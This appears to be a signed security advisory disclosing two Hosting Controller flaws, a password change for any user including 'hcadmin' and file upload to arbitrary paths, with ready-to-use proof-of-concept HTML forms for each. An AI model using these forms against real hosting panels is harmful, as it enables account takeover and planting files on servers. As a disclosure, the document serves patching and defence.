Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:

This allows to modify passwords:
<form
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser
"
method="post">
Username: <input name="UserName" value="hcadmin"
type="text" size="50">
<br>
Name: <input name="FullName" value="g|25|h"
type="text" size="50">
<br>
ChangePass (type true): <input type="checkbox" name="PassCheck"
value="TRUE">
<br>
Password: <input name="Pass1" title="Password">
<br>
Confirm: <input name="ConfPass" title="Password">
<br>
<input name="submit" value="submit" type="submit">

</form>
<br>
PS: You should have authenticated access.<br>
<br>

• -------------------------<br>
  Vulnerable versions:<br>
• • HC 2002 RC 1<br>
    Other versions may be vulnerable

And this allows to upload:
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test">
<br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have
authenticated access.
</form>
<br>

• -------------------------<br>
  Vulnerable versions:<br>
• • HC 2002 RC 1<br>
    Other versions may be vulnerable

This vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.

Sorry for my english, but i'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----